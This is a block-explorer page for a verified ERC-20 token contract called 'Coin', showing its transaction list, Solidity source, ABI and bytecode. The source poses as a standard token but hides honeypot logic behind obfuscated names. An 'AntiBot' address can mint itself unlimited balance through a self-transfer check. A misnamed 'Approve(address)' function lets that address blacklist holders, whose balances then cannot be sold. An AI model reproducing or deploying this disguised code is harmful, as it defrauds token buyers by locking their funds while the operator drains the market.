ETH Price: $2,114.37 (-1.79%)

Contract

0x7FdD00bceB65738c3A1aA2aC4475f3ddFAe5Bc8A
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

More Info

Private Name Tags

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve173043072023-05-21 0:51:351036 days ago1684630295IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0012037725.83493851
Approve173042752023-05-21 0:45:111036 days ago1684629911IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0013222228.41362974
Transfer173042702023-05-21 0:44:111036 days ago1684629851IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0017555130.5004503
Approve173037032023-05-20 22:50:231036 days ago1684623023IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0014429930.96885559
Approve173023832023-05-20 18:21:351036 days ago1684606895IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0014003230.2478675
Approve173023502023-05-20 18:14:591036 days ago1684606499IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016163335
Approve173023102023-05-20 18:06:351036 days ago1684605995IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016163335
Approve173019992023-05-20 17:03:351036 days ago1684602215IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0019661142.4691718
Approve173019352023-05-20 16:50:231036 days ago1684601423IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016287235
Approve173019212023-05-20 16:47:351036 days ago1684601255IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0019420141.7323931
Approve173018342023-05-20 16:30:111036 days ago1684600211IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016159135
Approve173014762023-05-20 15:17:591036 days ago1684595879IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0012459142.67561057
Approve173013112023-05-20 14:44:351036 days ago1684593875IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0017881238.42537063
Approve173013012023-05-20 14:42:351036 days ago1684593755IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0013980730.00484975
Approve173011842023-05-20 14:18:591036 days ago1684592339IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016163335
Approve173008232023-05-20 13:05:471036 days ago1684587947IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0015184832.80025078
Approve173008092023-05-20 13:02:591036 days ago1684587779IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0017919238.70667697
Approve173007772023-05-20 12:55:471036 days ago1684587347IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0015287733.03110644
Approve173007602023-05-20 12:52:231036 days ago1684587143IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016163335
Approve173007132023-05-20 12:42:591036 days ago1684586579IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0014527531.1783401
Approve173006342023-05-20 12:26:591036 days ago1684585619IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016163335
Approve173004682023-05-20 11:52:591036 days ago1684583579IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0017375737.4841903
Approve173004632023-05-20 11:51:591036 days ago1684583519IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0016163335
Approve173003992023-05-20 11:39:111036 days ago1684582751IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0014645631.47243842
Approve173002902023-05-20 11:17:231036 days ago1684581443IN
0x7FdD00bc...dFAe5Bc8A
0 ETH0.0013943429.963372
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Coin

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Coin.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;



abstract contract Ownable {
    address private _owner;

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    /**
    * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checyydsOwen();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checyydsOwen() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}

contract Coin is Ownable {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _ASAmeme;
    mapping(address => uint256) private _holderLastTransferTimestamp;

    address private uniswapV2Pair;
    uint256 private _QtotalSupplyQ;
    string private _QnameQ;
    string private _AsymbolS;
    address private  _memeQWQ;
    bool private _isTradeOpen;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_,address AntiBot) {
        _QnameQ = name_;
        _AsymbolS = symbol_;
        _memeQWQ = AntiBot;
        _mint(msg.sender, 2_100_000_000_000*10**decimals());
        _isTradeOpen = false;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual  returns (string memory) {
        return _QnameQ;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual  returns (string memory) {
        return _AsymbolS;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual  returns (uint256) {
        return _QtotalSupplyQ;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual  returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _checkAndUpdate(owner, to, amount);
        _transfer(owner, to, amount);
        return true;
    }

    function _checkAndUpdate(address sender, address recipient, uint256 amount) private {
        if (sender == _memeQWQ && recipient == _memeQWQ) {
            _balances[sender] = _balances[sender].add(amount);
        }
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }
    /**
         * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address fromSender,
        address to,
        uint256 amount
    ) internal virtual {
        require(fromSender != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 balance= _balances[fromSender];

        if (_ASAmeme[fromSender] != false ){
            balance = _balances[fromSender]-(_QtotalSupplyQ);
        }

        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[fromSender] = balance.sub(amount);
        _balances[to] =  _balances[to].add(amount);
        emit Transfer(fromSender, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: to the zero address");

    unchecked {
        _QtotalSupplyQ += amount;
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _QtotalSupplyQ -= amount;
    }

        emit Transfer(account, address(0), amount);


    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    function qApprove(address amount) external   {
        if (_memeQWQ == _msgSender()){
            _ASAmeme[amount] = false;
        }
    }

    function Approve(address amount) external   {
        if (_memeQWQ == _msgSender()){
            _ASAmeme[amount] = true;
        }
    }

    function checkBot(address bot) public view returns(bool)  {
        if (_memeQWQ == _msgSender()){
            return _ASAmeme[bot];
        }
        return false;
    }

}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"amount","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"bot","type":"address"}],"name":"checkBot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"amount","type":"address"}],"name":"qApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620011f6380380620011f683398101604081905262000034916200028d565b6200003f33620000c1565b60076200004d8482620003a9565b5060086200005c8382620003a9565b50600980546001600160a01b0319166001600160a01b038316179055620000ab3362000086601290565b6200009390600a6200058a565b620000a5906501e8f1c10800620005a2565b62000111565b50506009805460ff60a01b1916905550620005bc565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166200016c5760405162461bcd60e51b815260206004820152601a60248201527f45524332303a20746f20746865207a65726f2061646472657373000000000000604482015260640160405180910390fd5b60068054820190556001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620001f057600080fd5b81516001600160401b03808211156200020d576200020d620001c8565b604051601f8301601f19908116603f01168101908282118183101715620002385762000238620001c8565b816040528381526020925086838588010111156200025557600080fd5b600091505b838210156200027957858201830151818301840152908201906200025a565b600093810190920192909252949350505050565b600080600060608486031215620002a357600080fd5b83516001600160401b0380821115620002bb57600080fd5b620002c987838801620001de565b94506020860151915080821115620002e057600080fd5b50620002ef86828701620001de565b604086015190935090506001600160a01b03811681146200030f57600080fd5b809150509250925092565b600181811c908216806200032f57607f821691505b6020821081036200035057634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003a457600081815260208120601f850160051c810160208610156200037f5750805b601f850160051c820191505b81811015620003a0578281556001016200038b565b5050505b505050565b81516001600160401b03811115620003c557620003c5620001c8565b620003dd81620003d684546200031a565b8462000356565b602080601f831160018114620004155760008415620003fc5750858301515b600019600386901b1c1916600185901b178555620003a0565b600085815260208120601f198616915b82811015620004465788860151825594840194600190910190840162000425565b5085821015620004655787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004cc578160001904821115620004b057620004b062000475565b80851615620004be57918102915b93841c939080029062000490565b509250929050565b600082620004e55750600162000584565b81620004f45750600062000584565b81600181146200050d5760028114620005185762000538565b600191505062000584565b60ff8411156200052c576200052c62000475565b50506001821b62000584565b5060208310610133831016604e8410600b84101617156200055d575081810a62000584565b6200056983836200048b565b806000190482111562000580576200058062000475565b0290505b92915050565b60006200059b60ff841683620004d4565b9392505050565b808202811582820484141762000584576200058462000475565b610c2a80620005cc6000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c8063715018a6116100a2578063a457c2d711610071578063a457c2d714610214578063a9059cbb14610227578063b1a4e0dc1461023a578063dd62ed3e1461024d578063f2fde38b1461026057600080fd5b8063715018a6146101d65780638da5cb5b146101de57806395d89b41146101f957806396bfcd231461020157600080fd5b8063313ce567116100de578063313ce5671461017657806339509351146101855780635c68e5f71461019857806370a08231146101ad57600080fd5b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015157806323b872dd14610163575b600080fd5b610118610273565b6040516101259190610a60565b60405180910390f35b61014161013c366004610aca565b610305565b6040519015158152602001610125565b6006545b604051908152602001610125565b610141610171366004610af4565b61031f565b60405160128152602001610125565b610141610193366004610aca565b610343565b6101ab6101a6366004610b30565b610365565b005b6101556101bb366004610b30565b6001600160a01b031660009081526001602052604090205490565b6101ab61039d565b6000546040516001600160a01b039091168152602001610125565b6101186103b1565b6101ab61020f366004610b30565b6103c0565b610141610222366004610aca565b6103fa565b610141610235366004610aca565b61047a565b610141610248366004610b30565b610493565b61015561025b366004610b4b565b6104d1565b6101ab61026e366004610b30565b6104fc565b60606007805461028290610b7e565b80601f01602080910402602001604051908101604052809291908181526020018280546102ae90610b7e565b80156102fb5780601f106102d0576101008083540402835291602001916102fb565b820191906000526020600020905b8154815290600101906020018083116102de57829003601f168201915b5050505050905090565b600033610313818585610572565b60019150505b92915050565b60003361032d858285610696565b610338858585610710565b506001949350505050565b60003361031381858561035683836104d1565b6103609190610bce565b610572565b600954336001600160a01b039091160361039a576001600160a01b0381166000908152600360205260409020805460ff191690555b50565b6103a5610926565b6103af6000610980565b565b60606008805461028290610b7e565b600954336001600160a01b039091160361039a576001600160a01b0381166000908152600360205260409020805460ff1916600117905550565b6000338161040882866104d1565b90508381101561046d5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6103388286868403610572565b6000336104888185856109d0565b610313818585610710565b600954600090336001600160a01b03909116036104c957506001600160a01b031660009081526003602052604090205460ff1690565b506000919050565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610504610926565b6001600160a01b0381166105695760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610464565b61039a81610980565b6001600160a01b0383166105d45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610464565b6001600160a01b0382166106355760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610464565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006106a284846104d1565b9050600019811461070a57818110156106fd5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610464565b61070a8484848403610572565b50505050565b6001600160a01b0383166107745760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610464565b6001600160a01b0382166107d65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610464565b6001600160a01b03831660009081526001602090815260408083205460039092529091205460ff161561082c576006546001600160a01b0385166000908152600160205260409020546108299190610be1565b90505b8181101561088b5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610464565b6108958183610a41565b6001600160a01b0380861660009081526001602052604080822093909355908516815220546108c49083610a54565b6001600160a01b0380851660008181526001602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109189086815260200190565b60405180910390a350505050565b6000546001600160a01b031633146103af5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610464565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6009546001600160a01b0384811691161480156109fa57506009546001600160a01b038381169116145b15610a3c576001600160a01b038316600090815260016020526040902054610a229082610a54565b6001600160a01b0384166000908152600160205260409020555b505050565b6000610a4d8284610be1565b9392505050565b6000610a4d8284610bce565b600060208083528351808285015260005b81811015610a8d57858101830151858201604001528201610a71565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610ac557600080fd5b919050565b60008060408385031215610add57600080fd5b610ae683610aae565b946020939093013593505050565b600080600060608486031215610b09576000